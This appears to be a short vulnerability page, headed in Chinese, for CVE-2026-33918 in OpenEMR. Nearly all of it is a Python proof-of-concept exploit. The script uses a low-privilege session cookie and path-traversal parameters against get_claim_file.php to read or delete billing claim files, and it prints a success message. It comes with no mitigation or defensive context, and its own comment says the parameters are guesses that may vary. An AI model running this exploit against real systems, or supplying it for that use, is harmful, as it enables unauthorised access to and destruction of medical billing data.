CVE-2026-33918 OpenEMR权限绕过漏洞

import requests # Exploit for CVE-2026-33918 # Description: Access control bypass allows any authenticated user to download/delete billing files. target_url = "http://target-openemr.com/interface/billing/get_claim_file.php" # Valid session cookie for a low-privilege user session_cookies = { "PHPSESSID": "valid_session_id_here" } # Example parameters (actual params may vary based on OpenEMR configuration) payload_params = { "file": "../../data/claims/batch_file.csv", "delete": "1" } try: response = requests.get(target_url, cookies=session_cookies, params=payload_params) if response.status_code == 200: print("[+] Exploit Successful!") print("[+] File Content or Deletion Confirmation:") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] An error occurred: {e}")